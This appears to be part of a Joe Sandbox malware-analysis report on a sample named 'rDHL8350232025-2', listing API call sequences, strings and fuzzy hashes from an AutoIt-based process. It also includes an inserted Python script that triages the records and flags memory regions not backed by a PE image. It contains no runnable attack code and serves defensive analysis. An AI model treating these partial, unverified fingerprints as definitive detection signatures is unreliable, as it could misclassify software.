                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
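The function records above (and the "APIs" lists that precede some of them, as the one that follows) are worth machine-reading rather than scrolling: most functions come from the image-backed region at 00030000 ("based on PE: true"), but several come from 01178000, a region the sandbox could not attribute to any PE file. The following Python script is an added example, not code from the Joe Sandbox report or its tooling. It parses these records, groups functions by region, flags regions that are not PE-backed, and checks a function's API list for the CreateFileW / GetFileSize / GlobalAlloc / GlobalLock read-whole-file sequence. The only signal the report states is "based on PE: true/false"; decoding the dotted .sdmp name fields as Windows MEMORY_BASIC_INFORMATION protection and type constants is an assumption about Joe Sandbox's naming scheme and only refines that flag. The sample text is constructed from the records and API list on this page, with placeholder hash values.

```python
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Assumed, not stated by the report: a .sdmp name reads
# pid.stage.id.dump_base.protect.<undecoded>.mem_type.image_index, with protect and
# mem_type being Windows MEMORY_BASIC_INFORMATION constants (0x01000000 = MEM_IMAGE).
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x00020000

SOURCE_RE = re.compile(r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(?P<pe>true|false)")
API_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
HASH_RE = re.compile(r"^(?P<key>Opcode ID|Instruction Fuzzy Hash):\s*(?P<val>[0-9A-Fa-f]*)")
READ_FILE_CHAIN = ("CreateFileW", "GetFileSize", "GlobalAlloc", "GlobalLock")  # whole file -> HGLOBAL

ApiCall = namedtuple("ApiCall", "api module args ref")

@dataclass
class Region:
    name: str
    offset: int      # "Offset:" printed by the report (module / region base)
    protect: int     # assumed PAGE_* value taken from the dump name
    mem_type: int    # assumed MEM_* value taken from the dump name
    pe_backed: bool  # "based on PE:" printed by the report

    @property
    def suspicious(self) -> bool:
        # executable code no PE image accounts for, sitting in private RWX memory
        return (not self.pe_backed and self.mem_type == MEM_PRIVATE
                and bool(self.protect & PAGE_EXECUTE_READWRITE))

@dataclass
class FunctionRecord:
    region: Region
    apis: list = field(default_factory=list)
    opcode_id: str = ""
    instruction_fuzzy: str = ""

def parse_records(text: str) -> list:
    """One FunctionRecord per 'Memory Dump Source ... Instruction Fuzzy Hash' block."""
    records = []
    pending_apis = []  # an 'APIs' list precedes the record it belongs to
    cur = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if m := SOURCE_RE.search(line):
            parts = m["name"].split(".")
            if len(parts) < 8: raise ValueError(f"unexpected dump name: {m['name']}")
            region = Region(m["name"], int(m["offset"], 16), int(parts[4], 16),
                            int(parts[6], 16), m["pe"] == "true")
            cur, pending_apis = FunctionRecord(region, pending_apis), []
        elif (m := API_RE.match(line)) and cur is None:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            pending_apis.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
        elif (m := HASH_RE.match(line)) and cur is not None:
            if m["key"] == "Opcode ID":
                cur.opcode_id = m["val"]
            else:                       # Instruction Fuzzy Hash closes the record
                cur.instruction_fuzzy = m["val"]
                records.append(cur)
                cur = None
    return records

def has_api_chain(rec: FunctionRecord, chain: tuple) -> bool:
    """True if the APIs in `chain` occur in this function in that order (gaps allowed)."""
    names = iter(c.api for c in rec.apis)
    return all(name in names for name in chain)

def triage(text: str) -> dict:
    records = parse_records(text)
    by_region = {}
    for r in records:
        by_region.setdefault(r.region.offset, []).append(r)
    return {
        "functions": len(records),
        "functions_per_region": {base: len(fs) for base, fs in by_region.items()},
        "suspicious_regions": sorted(b for b, fs in by_region.items() if fs[0].region.suspicious),
        "read_file_into_memory": [r.region.offset for r in records if has_api_chain(r, READ_FILE_CHAIN)],
    }

# Constructed sample: the API list and the two dump sources from the report above,
# stitched into two complete records with placeholder hash values.
SAMPLE_REPORT = """
APIs
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2CF8
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 000B2D62
• GetFileSize.KERNEL32(00000000,00000000), ref: 000B2D75
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 000B2D80
• GlobalLock.KERNEL32(00000000), ref: 000B2D89
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Opcode ID: 0a0a0a0a
• Instruction Fuzzy Hash: 0E321171A002558B
Memory Dump Source
• Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
• Opcode ID: 0c0c0c0c
• Instruction Fuzzy Hash: 1AB012310527488B
"""
```

Running `triage(open("report.txt").read())` on the text of a full report lists every region that holds code without a backing PE image; on this sample that is 01178000 alone, and the 00030000 function is the one that opens a file and copies it whole into a GlobalAlloc buffer. Keep in mind that the region flag relies on the report's own "based on PE" field, while the protection and type decoding is the assumption named above, so treat the latter as a hint to be confirmed against the dump itself.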
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 000B2B30
                                                                                      • DeleteObject.GDI32(00000000), ref: 000B2B43
                                                                                      • DestroyWindow.USER32 ref: 000B2B52
                                                                                      • GetDesktopWindow.USER32 ref: 000B2B6D
                                                                                      • GetWindowRect.USER32(00000000), ref: 000B2B74
                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 000B2CA3
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 000B2CB1
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2CF8
                                                                                      • GetClientRect.USER32(00000000,?), ref: 000B2D04
                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000B2D40
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D62
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D75
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D80
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000B2D89
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D98
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000B2DA1
                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DA8
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 000B2DB3
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DC5
                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,000CFC38,00000000), ref: 000B2DDB
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 000B2DEB
                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 000B2E11
                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 000B2E30
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2E52
                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B303F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                      • API String ID: 2211948467-2373415609
                                                                                      • Opcode ID: 6f03a7541cfb51a32d8dddfc9eb7aa816545a3ebfa8517acd5a50591024d4f3b
                                                                                      • Instruction ID: e50d27151ea63e1c06794060a67721acb4deccd484197104a7db99f0f8b360f1
                                                                                      • Opcode Fuzzy Hash: 6f03a7541cfb51a32d8dddfc9eb7aa816545a3ebfa8517acd5a50591024d4f3b
                                                                                      • Instruction Fuzzy Hash: AA025C71900209EFEB14DF64CD89EAE7BB9FF49314F148158F919AB2A1CB74AD41CB60
                                                                                      APIs
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 000C712F
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000C7160
                                                                                      • GetSysColor.USER32(0000000F), ref: 000C716C
                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 000C7186
                                                                                      • SelectObject.GDI32(?,?), ref: 000C7195
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 000C71C0
                                                                                      • GetSysColor.USER32(00000010), ref: 000C71C8
                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 000C71CF
                                                                                      • FrameRect.USER32(?,?,00000000), ref: 000C71DE
                                                                                      • DeleteObject.GDI32(00000000), ref: 000C71E5
                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 000C7230
                                                                                      • FillRect.USER32(?,?,?), ref: 000C7262
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C7284
                                                                                        • Part of subcall function 000C73E8: GetSysColor.USER32(00000012), ref: 000C7421
                                                                                        • Part of subcall function 000C73E8: SetTextColor.GDI32(?,?), ref: 000C7425
                                                                                        • Part of subcall function 000C73E8: GetSysColorBrush.USER32(0000000F), ref: 000C743B
                                                                                        • Part of subcall function 000C73E8: GetSysColor.USER32(0000000F), ref: 000C7446
                                                                                        • Part of subcall function 000C73E8: GetSysColor.USER32(00000011), ref: 000C7463
                                                                                        • Part of subcall function 000C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000C7471
                                                                                        • Part of subcall function 000C73E8: SelectObject.GDI32(?,00000000), ref: 000C7482
                                                                                        • Part of subcall function 000C73E8: SetBkColor.GDI32(?,00000000), ref: 000C748B
                                                                                        • Part of subcall function 000C73E8: SelectObject.GDI32(?,?), ref: 000C7498
                                                                                        • Part of subcall function 000C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 000C74B7
                                                                                        • Part of subcall function 000C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000C74CE
                                                                                        • Part of subcall function 000C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 000C74DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                      • String ID:
                                                                                      • API String ID: 4124339563-0
                                                                                      • Opcode ID: ae0bb80c710feba4bf123bc65ff0a066c80da1b12f7d6f9c70277700a550cbc8
                                                                                      • Instruction ID: 72a56fa44a5af90ef38c3fd14f52cd8f3825bc62f417626113e36e6e2604d048
                                                                                      • Opcode Fuzzy Hash: ae0bb80c710feba4bf123bc65ff0a066c80da1b12f7d6f9c70277700a550cbc8
                                                                                      • Instruction Fuzzy Hash: 19A19D72008701AFEB109F64DC48E6F7BE9FB89320F140A19F9AA961E1D778E944CF51
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?), ref: 00048E14
                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00086AC5
                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00086AFE
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00086F43
                                                                                        • Part of subcall function 00048F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00048BE8,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048FC5
                                                                                      • SendMessageW.USER32(?,00001053), ref: 00086F7F
                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00086F96
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00086FAC
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00086FB7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                      • String ID: 0$p]
                                                                                      • API String ID: 2760611726-498393191
                                                                                      • Opcode ID: 6118c3b57d92d2c804a9f5829226d1140804a8a49659f1bb36232c286d476e96
                                                                                      • Instruction ID: 08016a8475fab9aaf18e2b5fd2bd5019e1f5f69a35562e07aedb61c9b5f7cd68
                                                                                      • Opcode Fuzzy Hash: 6118c3b57d92d2c804a9f5829226d1140804a8a49659f1bb36232c286d476e96
                                                                                      • Instruction Fuzzy Hash: 8712BC70600201EFDB65EF14C848FAAB7E1FB44304F158469F4C98B662CB36EC92CB55
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000), ref: 000B273E
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000B286A
                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 000B28A9
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 000B28B9
                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 000B2900
                                                                                      • GetClientRect.USER32(00000000,?), ref: 000B290C
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 000B2955
                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000B2964
                                                                                      • GetStockObject.GDI32(00000011), ref: 000B2974
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 000B2978
                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 000B2988
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000B2991
                                                                                      • DeleteDC.GDI32(00000000), ref: 000B299A
                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000B29C6
                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 000B29DD
                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 000B2A1D
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000B2A31
                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 000B2A42
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 000B2A77
                                                                                      • GetStockObject.GDI32(00000011), ref: 000B2A82
                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000B2A8D
                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 000B2A97
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                      • API String ID: 2910397461-517079104
                                                                                      • Opcode ID: 30db2170360cbf4af837c454e2add321c856227aa6cb118675cfc1c767c2db4a
                                                                                      • Instruction ID: 039f358524aa97314e5f24d19c7a8972b06eefe5678b96bca3595940f75304f1
                                                                                      • Opcode Fuzzy Hash: 30db2170360cbf4af837c454e2add321c856227aa6cb118675cfc1c767c2db4a
                                                                                      • Instruction Fuzzy Hash: F0B14D71A40215BFEB14DFA8CC49FAE7BA9FB08710F004114FA15EB691DBB4AD40CB94
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 000A4AED
                                                                                      • GetDriveTypeW.KERNEL32(?,000CCB68,?,\\.\,000CCC08), ref: 000A4BCA
                                                                                      • SetErrorMode.KERNEL32(00000000,000CCB68,?,\\.\,000CCC08), ref: 000A4D36
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DriveType
                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                      • API String ID: 2907320926-4222207086
                                                                                      • Opcode ID: 47eb78f307da9595ec29458b92caa27bc72b498566f7b03778ff553efdf94413
                                                                                      • Instruction ID: 10aaf39bc2af0a52dc51ec76496237a865259de0f69f58e2db9fd165dcb0ac8f
                                                                                      • Opcode Fuzzy Hash: 47eb78f307da9595ec29458b92caa27bc72b498566f7b03778ff553efdf94413
                                                                                      • Instruction Fuzzy Hash: F8613738701209DBCB54DFA4C982DBC77B1EB86310B248015FA0AAFA52CBF6DD45EB51
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000012), ref: 000C7421
                                                                                      • SetTextColor.GDI32(?,?), ref: 000C7425
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000C743B
                                                                                      • GetSysColor.USER32(0000000F), ref: 000C7446
                                                                                      • CreateSolidBrush.GDI32(?), ref: 000C744B
                                                                                      • GetSysColor.USER32(00000011), ref: 000C7463
                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 000C7471
                                                                                      • SelectObject.GDI32(?,00000000), ref: 000C7482
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 000C748B
                                                                                      • SelectObject.GDI32(?,?), ref: 000C7498
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 000C74B7
                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000C74CE
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000C74DB
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C752A
                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000C7554
                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 000C7572
                                                                                      • DrawFocusRect.USER32(?,?), ref: 000C757D
                                                                                      • GetSysColor.USER32(00000011), ref: 000C758E
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 000C7596
                                                                                      • DrawTextW.USER32(?,000C70F5,000000FF,?,00000000), ref: 000C75A8
                                                                                      • SelectObject.GDI32(?,?), ref: 000C75BF
                                                                                      • DeleteObject.GDI32(?), ref: 000C75CA
                                                                                      • SelectObject.GDI32(?,?), ref: 000C75D0
                                                                                      • DeleteObject.GDI32(?), ref: 000C75D5
                                                                                      • SetTextColor.GDI32(?,?), ref: 000C75DB
                                                                                      • SetBkColor.GDI32(?,?), ref: 000C75E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                      • String ID:
                                                                                      • API String ID: 1996641542-0
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 000C1128
                                                                                      • GetDesktopWindow.USER32 ref: 000C113D
                                                                                      • GetWindowRect.USER32(00000000), ref: 000C1144
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C1199
                                                                                      • DestroyWindow.USER32(?), ref: 000C11B9
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000C11ED
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C120B
                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000C121D
                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 000C1232
                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 000C1245
                                                                                      • IsWindowVisible.USER32(00000000), ref: 000C12A1
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 000C12BC
                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 000C12D0
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000C12E8
                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 000C130E
                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 000C1328
                                                                                      • CopyRect.USER32(?,?), ref: 000C133F
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 000C13AA
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                      • String ID: ($0$tooltips_class32
                                                                                      • API String ID: 698492251-4156429822
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 000C02E5
                                                                                      • _wcslen.LIBCMT ref: 000C031F
                                                                                      • _wcslen.LIBCMT ref: 000C0389
                                                                                      • _wcslen.LIBCMT ref: 000C03F1
                                                                                      • _wcslen.LIBCMT ref: 000C0475
                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 000C04C5
                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000C0504
                                                                                        • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                                                                        • Part of subcall function 0009223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00092258
                                                                                        • Part of subcall function 0009223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0009228A
                                                                                      Similarity
                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                      • API String ID: 1103490817-719923060
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00048968
                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00048970
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0004899B
                                                                                      • GetSystemMetrics.USER32(00000008), ref: 000489A3
                                                                                      • GetSystemMetrics.USER32(00000004), ref: 000489C8
                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000489E5
                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000489F5
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00048A28
                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00048A3C
                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00048A5A
                                                                                      • GetStockObject.GDI32(00000011), ref: 00048A76
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00048A81
                                                                                        • Part of subcall function 0004912D: GetCursorPos.USER32(?), ref: 00049141
                                                                                        • Part of subcall function 0004912D: ScreenToClient.USER32(00000000,?), ref: 0004915E
                                                                                        • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000001), ref: 00049183
                                                                                        • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                                                                      • SetTimer.USER32(00000000,00000000,00000028,000490FC), ref: 00048AA8
                                                                                      Similarity
                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                      • String ID: AutoIt v3 GUI
                                                                                      • API String ID: 1458621304-248962490
                                                                                      APIs
                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                                                                        • Part of subcall function 000910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
